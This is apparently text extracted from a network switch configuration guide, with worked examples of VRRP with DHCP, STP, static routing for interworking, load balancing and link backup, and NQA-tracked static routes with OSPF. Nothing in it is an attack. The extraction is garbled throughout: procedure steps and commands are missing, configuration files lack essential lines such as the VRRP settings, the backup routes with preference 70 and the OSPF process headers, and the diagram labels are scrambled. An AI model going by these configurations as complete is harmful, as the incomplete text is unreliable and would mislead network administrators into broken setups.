# Create VRRP group 1 on SwitchB, set the priority of SwitchB in the VRRP group to 100
(default), and configure clients to obtain IP addresses from a global address pool.
[SwitchB-Vlanif100] dhcp select global
Step 4 Configure STP to prevent loops.

# Enable STP globally on Switch. The configurations on SwitchA and SwitchB are similar to
that on Switch. For details, see the configuration files of SwitchA and SwitchB.
[Switch] stp enable
# Disable STP on GE1/0/3 of Switch, and set the path cost of GE1/0/1 to 20000.
[Switch-GigabitEthernet1/0/3] stp disable
[Switch-GigabitEthernet1/0/1] stp cost 20000

# Run the display vrrp command on SwitchA and SwitchB. The command output shows that
SwitchA is Master and SwitchB is Backup in the VRRP group.
State : Master
Virtual IP : 10.1.1.111
PriorityRun : 120
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46
State : Backup
Virtual IP : 10.1.1.111
PriorityRun : 100
TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE

Virtual MAC : 0000-5e00-0101

Check TTL : YES
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46
# Run the display ip pool command on SwitchA and SwitchB. The command output shows
that SwitchA, but not SwitchB, successfully allocated an IP address to the client.
[SwitchA] display ip pool
-----------------------------------------------------------------------------
Pool-name : 1
Pool-No : 0
Gateway-0 : 10.1.1.111
Network : 10.1.1.0
Mask : 255.255.255.0
VPN instance : --
Address Statistic: Total :253 Used :1
Idle :125 Expired :0
Conflict :0 Disable :127
Total :253
Used :1 Idle :125
[SwitchB] display ip pool
-----------------------------------------------------------------------------
Pool-name : 1
Pool-No : 0
Gateway-0 : 10.1.1.111
Network : 10.1.1.0
Mask : 255.255.255.0
VPN instance : --
Total :253
Used :0 Idle :125
# Run the shutdown command on GE1/0/2 and GE1/0/5 of SwitchA to simulate a fault.
# Run the display vrrp command on SwitchB to view the VRRP status. The command output
shows that SwitchB is Master.
State : Master
Virtual IP : 10.1.1.111
Master IP : 10.1.1.129
PriorityRun : 100


TimerRun : 1 s
TimerConfig : 1 s
Auth type : NONE
Virtual MAC : 0000-5e00-0101
Check TTL : YES
Create time : 2012-01-12 20:15:46
Last change time : 2012-01-12 20:15:46
# Run the display ip pool command on SwitchB to view the address pool configuration.
[SwitchB] display ip pool
-----------------------------------------------------------------------------
Pool-name : 1
Pool-No : 0
Gateway-0 : 10.1.1.111
Network : 10.1.1.0
Mask : 255.255.255.0
VPN instance : --
Total :253
Used :1 Idle :124
----End
Configuration Files
#
sysname SwitchA
#
vlan batch 100
#
dhcp enable
#
ip pool 1
network 10.1.1.0 mask 255.255.255.0
excluded-ip-address 10.1.1.1
#
interface Vlanif100
ip address 10.1.1.1 255.255.255.0
dhcp select global
#
#
#
return


#
sysname SwitchB
#
vlan batch 100
#
dhcp enable
#
ip pool 1
network 10.1.1.0 mask 255.255.255.0
#
interface Vlanif100
ip address 10.1.1.129 255.255.255.0
dhcp select global
#
#
#
return
l Configuration file of Switch

#
sysname Switch
#
vlan batch 100
#
#
#
stp disable
#
return
Video

Typical Configuration Examples 9 Typical Routing Configuration
9 Typical Routing Configuration
About This Chapter
9.1 Typical Static Route Configuration

9.2 Typical OSPF Configuration
9.3 Typical PBR Configuration

9.1 Typical Static Route Configuration
9.1.1 Example for Configuring Static Routes for Interworking

Between Different Network Segments
Static Route Overview
Static routes are manually configured by administrators. Static routes use less bandwidth than
dynamic routes and do not use CPU resources for route calculation and update analysis. When
a network fault occurs or the topology changes, static routes cannot be automatically updated
and must be manually reconfigured to adapt to the network change. Static routes have five
parameters: destination IP address, mask, outbound interface, next hop, and priority.
Static routes are easy to configure and control, and meet network requirements on a simple
network. On a complex network, static routes can also be configured to improve network
performance and ensure bandwidth for important applications.
Configuration Notes
l Communication between two devices is bidirectional, so reachable routes must be
available in both directions. To enable two devices to communicate through static routes,
configure a static route on the local device and then configure a return route on the peer
device.
l If an enterprise network has two egresses, two equal-cost static routes can be configured
for load balancing so that traffic can be evenly balanced between two different links. In
this case, two non-equal-cost static routes can be configured for active/standby backup.
When the active link is faulty, traffic is switched from the active link to the standby link.
As shown in Figure 9-1, hosts on different network segments are connected using several
Switches. Each two hosts on different network segments can communicate with each other
without using dynamic routing protocols.

Figure 9-1 Networking diagram of configuring static routes for interworking between
different network segments
PC2
10.1.2.2/24
GE1/0/3
VLANIF40
10.1.2.1/24
GE1/0/1 GE1/0/2
VLANIF10 VLANIF20
10.1.4.2/30 10.1.4.5/30
SwitchB
SwitchA SwitchC
GE1/0/1 GE1/0/1
VLANIF10 VLANIF20
10.1.4.1/30 10.1.4.6/30
GE1/0/2 GE1/0/2
VLANIF30 VLANIF50
10.1.1.1/24 10.1.3.1/24
PC1 PC3
10.1.1.2/24 10.1.3.2/24
1. Create VLANs, add interfaces to the VLANs, and assign IPv4 addresses to VLANIF
interfaces so that neighboring devices can communicate with each other.
2. Configure the IPv4 default gateway on each host, and configure IPv4 static routes or
default static routes on each Switch so that hosts on different network segments can
communicate with each other.
Procedure
Step 1 Create VLANs and add interfaces to the VLANs.
configuration of SwitchA.
Step 2 Assign IPv4 addresses to the VLANIF interfaces.



Step 3 Configure hosts.

Set the default gateway addresses of PC1, PC2, and PC3 to 10.1.1.1, 10.1.2.1, and 10.1.3.1
respectively.
Step 4 Configure static routes.
# Configure a default IPv4 route on SwitchA.
[SwitchA] ip route-static 0.0.0.0 0.0.0.0 10.1.4.2
# Configure two IPv4 static routes on SwitchB.

# Configure a default IPv4 route on SwitchC.

[SwitchC] ip route-static 0.0.0.0 0.0.0.0 10.1.4.5

# Check the IP routing table on SwitchA.
[SwitchA] display ip routing-table
------------------------------------------------------------------------------
0.0.0.0/0 Static 60 0 RD 10.1.4.2 Vlanif10

10.1.1.0/24 Direct 0 0 D 10.1.1.1 Vlanif30
10.1.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif30
10.1.4.0/30 Direct 0 0 D 10.1.4.1 Vlanif10
10.1.4.1/32 Direct 0 0 D 127.0.0.1 Vlanif10
# Run the ping command to verify the connectivity.

[SwitchA] ping 10.1.3.1
PING 10.1.3.1: 56 data bytes, press CTRL_C to break
Reply from 10.1.3.1: bytes=56 Sequence=1 ttl=253 time=62 ms

0.00% packet loss
# Run the tracert command to verify the connectivity.

[SwitchA] tracert 10.1.3.1
traceroute to 10.1.3.1(10.1.3.1), max hops: 30 ,packet length: 40,press CTRL_C
to break
1 10.1.4.2 31 ms 32 ms 31 ms
2 10.1.3.1 62 ms 63 ms 62 ms
----End

Configuration Files
#
sysname SwitchA
#
vlan batch 10 30
#
interface Vlanif10
ip address 10.1.4.1 255.255.255.252
#
interface Vlanif30
ip address 10.1.1.1 255.255.255.0
#
#
#
ip route-static 0.0.0.0 0.0.0.0 10.1.4.2
#
return

#
sysname SwitchB
#
vlan batch 10 20 40
#
interface Vlanif10
ip address 10.1.4.2 255.255.255.252
#
interface Vlanif20
ip address 10.1.4.5 255.255.255.252
#
interface Vlanif40
ip address 10.1.2.1 255.255.255.0
#
#
#
#
ip route-static 10.1.1.0 255.255.255.0 10.1.4.1
ip route-static 10.1.3.0 255.255.255.0 10.1.4.6
#
return

#
sysname SwitchC
#
vlan batch 20 50
#
interface Vlanif20
ip address 10.1.4.6 255.255.255.252
#
interface Vlanif50
ip address 10.1.3.1 255.255.255.0

#
#
#
ip route-static 0.0.0.0 0.0.0.0 10.1.4.5
#
return
Video
How to Configure a Static Route
How to Configure a Default Route
How to Configure a Floating Static Route
9.1.2 Example for Configuring Static Routes for Load Balancing

Configuration Notes
device.
On the network shown in Figure 9-2, PC1 and PC2 are connected through four Switches.
Data traffic can be transmitted from PC1 to PC2 through two links: PC1-SwitchA-SwitchB-
SwitchC-PC2 and PC1-SwitchA-SwitchD-SwitchC-PC2. To improve link efficiency, users
want to implement load balancing between the two links. That is, traffic from PC1 to PC2 is
evenly balanced between the two links. When faults occur on one of the two links, traffic is
automatically switched to the other link.

NOTE
In this scenario, ensure that all connected interfaces have STP disabled. If STP is enabled and VLANIF
interfaces of switches are used to construct a Layer 3 ring network, an interface on the network may be
blocked. As a result, Layer 3 services on the network cannot run normally.
Figure 9-2 Configuring static routes for load balancing

SwitchB
GE1/0/1 GE1/0/2
VLANIF100 VLANIF200
192.168.12.2/24 192.168.23.1/24
GE1/0/1 GE1/0/2 GE1/0/2 GE1/0/1

VLANIF10 VLANIF100 VLANIF200 VLANIF20
10.1.1.1/24 192.168.12.1/24 192.168.23.2/24 10.1.2.1/24
SwitchA SwitchC
PC1 GE1/0/3 GE1/0/3 PC2
10.1.1.2 VLANIF400 VLANIF300 10.1.2.2
192.168.14.1/24 192.168.34.1/24
GE1/0/1 GE1/0/2
VLANIF400 VLANIF300
192.168.14.2/24 192.168.34.2/24
SwitchD
1. Create VLANs, add interfaces to the VLANs, and assign IP addresses to VLANIF
interfaces.
2. Configure static routes in two directions of data traffic.
3. Configure default gateways for hosts.
Procedure
Step 1 Specify the VLANs to which interfaces belong.
# Configure SwitchA. The configurations of SwitchB, SwitchC, and SwitchD are similar to
the configuration of SwitchA, and are not mentioned here.


Step 2 Configure an IP address for each VLANIF interface.


Assign IP address 10.1.1.2/24 and default gateway IP address 10.1.1.1 to PC1; assign IP
address 10.1.2.2/24 and default gateway IP address 10.1.2.1 to PC2.
Step 4 Configure static routes from PC1 to PC2.
# On SwitchA, configure two equal-cost static routes, of which next hops point to SwitchB
and SwitchD respectively. This configuration can implement load balancing for traffic from
PC1 to PC2.
[SwitchA] ip route-static 10.1.2.0 24 192.168.12.2
[SwitchB] ip route-static 10.1.2.0 24 192.168.23.2
# Configure SwitchD.
[SwitchD] ip route-static 10.1.2.0 24 192.168.34.1

# On SwitchC, configure two equal-cost static routes, of which next hops point to SwitchB
and SwitchD respectively. This configuration can implement load balancing for traffic from
PC2 to PC1.
[SwitchC] ip route-static 10.1.1.0 24 192.168.23.1

------------------------------------------------------------------------------

10.1.1.0/24 Direct 0 0 D 10.1.1.1 Vlanif10

10.1.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif10
10.1.2.0/24 Static 60 0 RD 192.168.12.2 Vlanif100
Static 60 0 RD 192.168.14.2 Vlanif400
192.168.12.0/24 Direct 0 0 D 192.168.12.1 Vlanif100
192.168.12.1/32 Direct 0 0 D 127.0.0.1 Vlanif100
192.168.14.0/24 Direct 0 0 D 192.168.14.1 Vlanif400
192.168.14.1/32 Direct 0 0 D 127.0.0.1 Vlanif400
The IP routing table on SwitchA contains two equal-cost routes to network segment
10.1.2.0/24. In this situation, data traffic is evenly balanced between two different links,
achieving load balancing.
----End
Configuration Files
l SwitchA configuration file
#
sysname SwitchA
#
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
#
interface Vlanif100
ip address 192.168.12.1 255.255.255.0
#
interface Vlanif400
ip address 192.168.14.1 255.255.255.0
#
#
#
#
ip route-static 10.1.2.0 255.255.255.0 192.168.12.2
ip route-static 10.1.2.0 255.255.255.0 192.168.14.2
#
return
l SwitchB configuration file

#
sysname SwitchB
#
vlan batch 100 200
#
interface Vlanif100
ip address 192.168.12.2 255.255.255.0
#
interface Vlanif200
ip address 192.168.23.1 255.255.255.0
#


#
#
ip route-static 10.1.1.0 255.255.255.0 192.168.12.1
ip route-static 10.1.2.0 255.255.255.0 192.168.23.2
#
return
l SwitchC configuration file

#
sysname SwitchC
#
#
interface Vlanif20
ip address 10.1.2.1 255.255.255.0
#
interface Vlanif200
ip address 192.168.23.2 255.255.255.0
#
interface Vlanif300
ip address 192.168.34.1 255.255.255.0
#
#
#
#
ip route-static 10.1.1.0 255.255.255.0 192.168.23.1
ip route-static 10.1.1.0 255.255.255.0 192.168.34.2
#
return
l SwitchD configuration file

#
sysname SwitchD
#
vlan batch 300 400
#
interface Vlanif300
ip address 192.168.34.2 255.255.255.0
#
interface Vlanif400
ip address 192.168.14.2 255.255.255.0
#
#
#
ip route-static 10.1.1.0 255.255.255.0 192.168.14.1
ip route-static 10.1.2.0 255.255.255.0 192.168.34.1
#
return

Video
9.1.3 Example for Configuring Static Routes for Link Backup

Configuration Notes
device.
On the network shown in Figure 9-3, PC1 and PC2 are connected through four Switches.
Data traffic of PC1 can reach PC2 through two links: PC1-SwitchA-SwitchB-SwitchC-PC2
and PC1-SwitchA-SwitchD-SwitchC-PC2. To improve reliability, users want to implement
backup between the two links. That is, traffic from PC1 to PC2 is first transmitted through the
link that passes through SwitchB. When faults occur on this link, traffic is automatically
switched to the link that passes through SwitchD.
NOTE

Figure 9-3 Configuring static routes for link backup
SwitchB
GE1/0/1 GE1/0/2
VLANIF100 VLANIF200
192.168.12.2/24 192.168.23.1/24
GE1/0/1 GE1/0/2 GE1/0/2 GE1/0/1

VLANIF10 VLANIF100 VLANIF200 VLANIF20
10.1.1.1/24 192.168.12.1/24 192.168.23.2/24 10.1.2.1/24
SwitchA SwitchC
PC1 GE1/0/3 GE1/0/3 PC2
10.1.1.2 VLANIF400 VLANIF300 10.1.2.2
192.168.14.1/24 192.168.34.1/24
GE1/0/1 GE0/0/2
VLANIF400 VLANIF300
192.168.14.2/24 192.168.34.2/24
SwitchD
1. Create VLANs, add interfaces to the VLANs, and assign IP addresses to VLANIF
interfaces.
2. Configure static routes in two directions of data traffic.
3. Configure default gateways for hosts.
Procedure


Assign IP address 10.1.1.2/24 and default gateway IP address 10.1.1.1 to PC1; assign IP
address 10.1.2.2/24 and default gateway IP address 10.1.2.1 to PC2.
# On SwitchA, configure two static routes with different priorities, of which next hops point
to SwitchB and SwitchD respectively. Subsequently, data traffic is first forwarded to SwitchB.
When faults occur on the link that passes through SwitchB, the traffic is automatically
switched to SwitchD.
[SwitchA] ip route-static 10.1.2.0 24 192.168.14.2 preference 70
Step 5 Configure static routes from PC2 to PC1 and ensure that the active and standby links in two
directions are the same.
# On SwitchC, configure two static routes with different priorities, of which next hops point
to SwitchB and SwitchD respectively. Subsequently, data traffic is first forwarded to SwitchB.
When faults occur on the link that passes through SwitchB, traffic is automatically switched
to SwitchD.
[SwitchC] ip route-static 10.1.1.0 24 192.168.34.2 preference 70

------------------------------------------------------------------------------

10.1.1.0/24 Direct 0 0 D 10.1.1.1 Vlanif10

10.1.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif10
10.1.2.0/24 Static 60 0 RD 192.168.12.2 Vlanif100
192.168.12.0/24 Direct 0 0 D 192.168.12.1 Vlanif100
192.168.12.1/32 Direct 0 0 D 127.0.0.1 Vlanif100
192.168.14.0/24 Direct 0 0 D 192.168.14.1 Vlanif400
192.168.14.1/32 Direct 0 0 D 127.0.0.1 Vlanif400
# Check detailed information about the IP routing table on SwitchA.

[SwitchA] display ip routing-table 10.1.2.0 24 verbose
------------------------------------------------------------------------------
Routing Table : Public
Summary Count : 2
Destination: 10.1.2.0/24
Protocol: Static Process ID: 0
State: Active Adv Relied Age: 00h13m13s
Tag: 0 Priority: medium
IndirectID: 0x80000001
RelayNextHop: 0.0.0.0 Interface: Vlanif100
TunnelID: 0x0 Flags: RD
Destination: 10.1.2.0/24
Protocol: Static Process ID: 0
State: Inactive Adv Relied Age: 00h00m45s
Tag: 0 Priority: medium
IndirectID: 0x80000002
RelayNextHop: 0.0.0.0 Interface: Vlanif400
TunnelID: 0x0 Flags: R
The IP routing table on SwitchA contains only one active route to network segment
10.1.2.0/24. Normally, data traffic from PC1 to PC2 is transmitted through the link that passes
through SwitchB. Detailed information about the IP routing table on SwitchA shows two
routes to network segment 10.1.2.0/24: one Active route that passes through SwitchB and the
other Inactive route that passes through SwitchD. When faults occur on the active link, the
Inactive route will become active to take over the traffic. This implements link backup.
----End
Configuration Files
#
sysname SwitchA
#
#
interface Vlanif10
ip address 10.1.1.1 255.255.255.0
#
interface Vlanif100
ip address 192.168.12.1 255.255.255.0
#
interface Vlanif400
ip address 192.168.14.1 255.255.255.0
#

#
#
#
ip route-static 10.1.2.0 255.255.255.0 192.168.12.2
#
return
l SwitchB configuration file
#
sysname SwitchB
#
vlan batch 100 200
#
interface Vlanif100
ip address 192.168.12.2 255.255.255.0
#
interface Vlanif200
ip address 192.168.23.1 255.255.255.0
#
#
#
ip route-static 10.1.1.0 255.255.255.0 192.168.12.1
ip route-static 10.1.2.0 255.255.255.0 192.168.23.2
#
return
#
sysname SwitchC
#
#
interface Vlanif20
ip address 10.1.2.1 255.255.255.0
#
interface Vlanif200
ip address 192.168.23.2 255.255.255.0
#
interface Vlanif300
ip address 192.168.34.1 255.255.255.0
#
#
#
#
ip route-static 10.1.1.0 255.255.255.0 192.168.23.1


#
return

#
sysname SwitchD
#
vlan batch 300 400
#
interface Vlanif300
ip address 192.168.34.2 255.255.255.0
#
interface Vlanif400
ip address 192.168.14.2 255.255.255.0
#
#
#
ip route-static 10.1.1.0 255.255.255.0 192.168.14.1
ip route-static 10.1.2.0 255.255.255.0 192.168.34.1
#
return
Video
9.1.4 Example for Configuring NQA for IPv4 Static Routes
Overview of NQA for IPv4 Static Routes

The network quality analysis (NQA) technology measures network performance and collects
statistics on the delay, jitter, and packet loss ratio. NQA can measure real-time network QoS,
and perform effective network fault diagnosis and location.
On a simple network or when the route to the destination cannot be established using dynamic
routing protocols, static routes can be configured. Unlike dynamic routing protocols, static
routes do not have a dedicated detection mechanism. If a fault occurs, static routes cannot
detect the fault, and the network administrator must delete the corresponding static route. This
delays the link switchover and may cause lengthy service interruptions.
BFD for IPv4 static routes is adaptable to link changes but both ends of the link must support
BFD. If either end of a link does not support BFD, NQA for IPv4 static routes can be
configured. When an NQA test instance detects a link fault, it instructs the routing
management module to delete the associated static route from the IP routing table. Then
service traffic switches to a route without any link fault to prevent lengthy service
interruptions.

Configuration Notes
l The NQA function of the S12700 can be used only when a license is available. If the
license is unavailable, the NQA commands can be run on the S12700, but the NQA
function does not take effect.
On a company network shown in Figure 9-4, access switches SwitchD and SwitchE connect
to aggregation switches SwitchB and SwitchC in dual-homing mode through static routes to
implement redundancy. The requirements are as follows:
l A detection mechanism is deployed for static routes so that static routes can detect link
faults and traffic can switch from a faulty link to prevent lengthy service interruptions.
l In normal cases, traffic is transmitted along the primary link SwitchB→SwitchD.
l When the primary link becomes faulty, traffic switches to the backup link
SwitchC→SwitchD.
NOTE
Figure 9-4 NQA for IPv4 static routes
IP N e t w o r k
S w it c h A
G E 1 /0 /1 G E 1 /0 /2
S w it c h B G E 1 /0 /1 G E 1 /0 /1 S w it c h C
VL 0
G E 1 /0 /3 AN IF 6 G E 1 /0 /3
G E IF 5 0 L A N 1 /0 /2
V
1 /0 GE
/2
V L A N IF 1 0 0 VL V L A N IF 2 0
G E 1 /0 /1 IF 6 /2 AN
G E 1 /0 /1
AN 0 G E IF 5 0
VL E 1/ ...... 1 /0
G /2
V L A N IF 7 0 GE V L A N IF 8 0
3
G E 1 /0 /4 1/
0/ / 0/ G E 1 /0 /4
S w it c h D 3 G E1 S w it c h E
...... ......
C lie n t 1 C lie n t 1 0 C lie n t 9 1 C lie n t 1 0 0
Device Name Interface IP Address
VLANIF 30 192.168.3.1/24
SwitchA
VLANIF 40 192.168.4.1/24
VLANIF 30 192.168.3.2/24
SwitchB
VLANIF 50 192.168.5.1/24

Device Name Interface IP Address
VLANIF 10 192.168.1.1/24
VLANIF 40 192.168.4.2/24
SwitchC VLANIF 60 192.168.6.1/24
VLANIF 20 192.168.2.1/24
VLANIF 10 192.168.1.2/24
SwitchD VLANIF 60 192.168.6.2/24
VLANIF 70 192.168.7.1/24
VLANIF 20 192.168.2.2/24
SwitchE VLANIF 50 192.168.5.2/24
VLANIF 80 192.168.8.1/24
1. Create an Internet Control Message Protocol (ICMP) NQA test instance to monitor the
status of the primary link.
Create an ICMP NQA test instance on the NQA client SwitchB to test whether the
primary link SwitchB→SwitchD is running properly.
2. Configure static routes and associate the static routes with the NQA test instance.
Configure static routes on aggregation switches SwitchB and SwitchC, and associate the
static route configured on SwitchB with the ICMP NQA test instance. When the ICMP
NQA test instance detects a link fault, it instructs the routing management module to
delete the associated static route from the IPv4 routing table.
3. Configure a dynamic routing protocol. Configure a dynamic routing protocol on
aggregation switches SwitchA, SwitchB, and SwitchC so that they can learn routes from
each other.
4. Configure the dynamic routing protocol to import static routes, and set a higher cost for
the static route used for the backup link than for the static route used for the primary link
to improve link reliability.
Configure the dynamic routing protocol on aggregation switches SwitchB and SwitchC
to import static routes, and set a higher cost for the static route imported by SwitchC than
for the static route imported by SwitchB. This configuration allows SwitchA to
preferentially select the link SwitchB→SwitchD with a lower cost.
Procedure
Step 1 Configure VLANs that each interface belongs to.
# Configure SwitchA. Ensure that the configurations of SwitchB, SwitchC, SwitchD, and
SwitchE are the same as the configuration of SwitchA.



# Configure SwitchA. Ensure that the configurations of SwitchB, SwitchC, SwitchD, and
SwitchE are the same as the configuration of SwitchA.
Step 3 Create an NQA test instance on SwitchB to test the link between SwitchB and SwitchD.
[SwitchB] nqa test-instance user test //Create an NQA test instance with the
administrator name user and instance name test.
[SwitchB-nqa-user-test] test-type icmp //Set the test type of the NQA test
instance to ICMP.
[SwitchB-nqa-user-test] destination-address ipv4 192.168.1.2 //Configure the
destination address of the NQA test instance to 192.168.1.2.
[SwitchB-nqa-user-test] frequency 10 //Set the interval of periodic NQA test
instances to 10s.
[SwitchB-nqa-user-test] probe-count 2 //Set the number of probes to be sent
each time in the NQA test instance to 2.
[SwitchB-nqa-user-test] interval seconds 5 //Set the interval at which probe
packets are sent in the NQA test instance to 5s.
[SwitchB-nqa-user-test] timeout 4 //Set the timeout period of a probe in the
NQA test instance to 4s.
[SwitchB-nqa-user-test] start now
[SwitchB-nqa-user-test] quit
Step 4 Configure IPv4 static routes.

# Configure an IPv4 static route on SwitchB and associate it with the NQA test instance.
[SwitchB] ip route-static 192.168.7.0 255.255.255.0 Vlanif 10 192.168.1.2 track
nqa user test
# Configure an IPv4 static route on SwitchC.

[SwitchC] ip route-static 192.168.7.0 255.255.255.0 Vlanif 60 192.168.6.2
Step 5 Configure a dynamic routing protocol on SwitchA, SwitchB, and SwitchC. OSPF is used in
this example.
# Configure OSPF on SwitchA.
[SwitchA] ospf 1 router-id 10.1.1.1
[SwitchA-ospf-1] area 0.0.0.0
# Configure OSPF on SwitchB.

[SwitchB] ospf 1 router-id 10.2.2.2
[SwitchB-ospf-1] area 0.0.0.0
[SwitchB-ospf-1-area-0.0.0.0] network 192.168.3.0 0.0.0.255

[SwitchB-ospf-1-area-0.0.0.0] quit
[SwitchB-ospf-1] quit
# Configure OSPF on SwitchC.

[SwitchC] ospf 1 router-id 10.3.3.3
[SwitchC-ospf-1] area 0.0.0.0
[SwitchC-ospf-1-area-0.0.0.0] network 192.168.4.0 0.0.0.255
[SwitchC-ospf-1-area-0.0.0.0] quit
[SwitchC-ospf-1] quit
Step 6 Configure OSPF on SwitchB and SwitchC to import static routes.

# Configure OSPF on SwitchB to import a static route, and set the cost to 10 for the static
route.
[SwitchB] ospf 1
[SwitchB-ospf-1] import-route static cost 10
# Configure OSPF on SwitchC to import a static route, and set the cost to 20 for the static
route.
[SwitchC] ospf 1
[SwitchC-ospf-1] import-route static cost 20

After the configuration is complete, run the display current-configuration | include nqa
command on aggregation switch Switch B in the system view. The command output shows
that the IPv4 static route has been associated with the NQA test instance. Run the display nqa
results command. The command output shows that an NQA test instance has been created.
# Check configurations of NQA for IPv4 static routes.
[SwitchB] display current-configuration | include nqa
ip route-static 192.168.7.0 255.255.255.0 Vlanif10 192.168.1.2 track nqa user test
nqa test-instance user test
# Check NQA test results.

[SwitchB] display nqa results test-instance user test
NQA entry(user, test) :testflag is active ,testtype is icmp

1 . Test 288 result The test is finished
Send operation times: 2 Receive response times: 2
Completion:success RTD OverThresholds number: 0
Attempts number:1 Drop operation number:0
Disconnect operation number:0 Operation timeout number:0
System busy operation number:0 Connection fail number:0
Operation sequence errors number:0 RTT Status errors number:0
Destination ip address:192.168.1.2
Min/Max/Average Completion Time: 3/4/3
Sum/Square-Sum Completion Time: 7/25
Last Good Probe Time: 2014-09-09 09:55:38.2
Lost packet ratio: 0 %
The command output shows "Lost packet ratio 0 %," indicating that the link is running
properly.
# Check the IP routing table on Switch B.
[SwitchB] display ip routing-table
------------------------------------------------------------------------------


192.168.1.0/24 Direct 0 0 D 192.168.1.1 Vlanif10
192.168.1.1/32 Direct 0 0 D 127.0.0.1 Vlanif10
192.168.3.0/24 Direct 0 0 D 192.168.3.2 Vlanif30
192.168.3.2/32 Direct 0 0 D 127.0.0.1 Vlanif30
192.168.4.0/24 OSPF 10 2 D 192.168.3.1 Vlanif30
192.168.5.0/24 Direct 0 0 D 192.168.5.1 Vlanif50
192.168.5.1/32 Direct 0 0 D 127.0.0.1 Vlanif50
192.168.7.0/24 Static 60 0 D 192.168.1.2 Vlanif10
# Check the IP routing table on aggregation switch SwitchA.

------------------------------------------------------------------------------

192.168.3.0/24 Direct 0 0 D 192.168.3.1 Vlanif30
192.168.3.1/32 Direct 0 0 D 127.0.0.1 Vlanif30
192.168.4.0/24 Direct 0 0 D 192.168.4.1 Vlanif40
192.168.4.1/32 Direct 0 0 D 127.0.0.1 Vlanif40
192.168.7.0/24 O_ASE 150 10 D 192.168.3.2 Vlanif30
The command output shows that a route to 192.168.7.0/24 exists in the routing table. The
route's next hop address is 192.168.3.2 and the cost is 10. Traffic is preferentially transmitted
along the link SwitchB -> SwitchD.
# Shut down GigabitEthernet1/0/3 on SwitchB to simulate a link fault.
[SwitchB] interface GigabitEthernet1/0/3
[SwitchB-GigabitEthernet1/0/3] shutdown
# Check NQA test results.

[SwitchB] display nqa results test-instance user test
NQA entry(user, test) :testflag is active ,testtype is icmp

1 . Test 309 result The test is finished
Send operation times: 2 Receive response times: 0
Completion:failed RTD OverThresholds number: 0
Attempts number:1 Drop operation number:2
Disconnect operation number:0 Operation timeout number:0
System busy operation number:0 Connection fail number:0
Operation sequence errors number:0 RTT Status errors number:0
Destination ip address:192.168.1.2
Min/Max/Average Completion Time: 0/0/0
Sum/Square-Sum Completion Time: 0/0
Last Good Probe Time: 0000-00-00 00:00:00.0
Lost packet ratio: 100 %
The command output shows "Completion:failed" and "Lost packet ratio is 100 %," indicating
that the link is faulty.
# Check the IP routing table on SwitchB.
------------------------------------------------------------------------------


192.168.3.0/24 Direct 0 0 D 192.168.3.2 Vlanif30
192.168.3.2/32 Direct 0 0 D 127.0.0.1 Vlanif30
192.168.4.0/24 OSPF 10 2 D 192.168.3.1 Vlanif30
192.168.5.0/24 Direct 0 0 D 192.168.5.1 Vlanif50
192.168.5.1/32 Direct 0 0 D 127.0.0.1 Vlanif50
192.168.7.0/24 O_ASE 150 20 D 192.168.3.1 Vlanif30
The command output shows that the static route has been deleted.
------------------------------------------------------------------------------

192.168.3.0/24 Direct 0 0 D 192.168.3.1 Vlanif30
192.168.3.1/32 Direct 0 0 D 127.0.0.1 Vlanif30
192.168.4.0/24 Direct 0 0 D 192.168.4.1 Vlanif40
192.168.4.1/32 Direct 0 0 D 127.0.0.1 Vlanif40
192.168.7.0/24 O_ASE 150 20 D 192.168.4.2 Vlanif40
The static route has been associated with the NQA test instance on SwitchB. If NQA detects a
link fault, it rapidly notifies SwitchB that the associated static route is unavailable. SwitchA
cannot learn the route to 192.168.7.0/24 from SwitchB. However, SwitchA can learn the route
to 192.168.7.0/24 from SwitchC. The route's next hop address is 192.168.4.2, and the cost is
20. Traffic switches to the link SwitchC -> SwitchD.
----End
Configuration Files
l Configuration file of aggregation switch SwitchA
#
sysname SwitchA
#
vlan batch 30 40
#
interface Vlanif30
ip address 192.168.3.1 255.255.255.0
#
interface Vlanif40
ip address 192.168.4.1 255.255.255.0
#
#
#
area 0.0.0.0
network 192.168.3.0 0.0.0.255
network 192.168.4.0 0.0.0.255

#
return
l Configuration file of aggregation switch SwitchB
#
sysname SwitchB
#
vlan batch 10 30 50
#
interface Vlanif10
ip address 192.168.1.1 255.255.255.0
#
interface Vlanif30
ip address 192.168.3.2 255.255.255.0
#
interface Vlanif50
ip address 192.168.5.1 255.255.255.0
#
#
#
#
import-route static cost 10
area 0.0.0.0
network 192.168.3.0 0.0.0.255
#
ip route-static 192.168.7.0 255.255.255.0 Vlanif10 192.168.1.2 track nqa user
test
#
nqa test-instance user test
test-type icmp
destination-address ipv4 192.168.1.2
frequency 10
interval seconds 5
timeout 4
probe-count 2
start now
#
return
l Configuration file of aggregation switch SwitchC
#
sysname SwitchC
#
vlan batch 20 40 60
#
interface Vlanif20
ip address 192.168.2.1 255.255.255.0
#
interface Vlanif40
ip address 192.168.4.2 255.255.255.0
#
interface Vlanif60
ip address 192.168.6.1 255.255.255.0
#
#


#
#
import-route static cost 20
area 0.0.0.0
network 192.168.4.0 0.0.0.255
#
ip route-static 192.168.7.0 255.255.255.0 Vlanif60 192.168.6.2
#
return
l Configuration file of access switch SwitchD
#
sysname SwitchD
#
vlan batch 10 60 70
#
interface Vlanif10
ip address 192.168.1.2 255.255.255.0
#
interface Vlanif60
ip address 192.168.6.2 255.255.255.0
#
interface Vlanif70
ip address 192.168.7.1 255.255.255.0
#
#
#
#
return
l Configuration file of access switch SwitchE
#
sysname SwitchE
#
vlan batch 20 50 80
#
interface Vlanif20
ip address 192.168.2.2 255.255.255.0
#
interface Vlanif50
ip address 192.168.5.2 255.255.255.0
#
interface Vlanif80
ip address 192.168.8.1 255.255.255.0
#
#
#

#
return
Video
9.1.5 Example for Configuring EFM for IPv4 Static Routes

Overview of EFM for IPv4 Static Routes
Ethernet in the first mile (EFM) defines the specifications of the Ethernet physical layer for
user access and implements Ethernet management and maintenance, providing link-level
operation and management (OAM). EFM provides link connectivity detection, link fault
monitoring, remote fault notification, and remote loopback functions on a link between two
directly-connected devices.
Static routes are easy to configure and therefore widely used on networks with simple
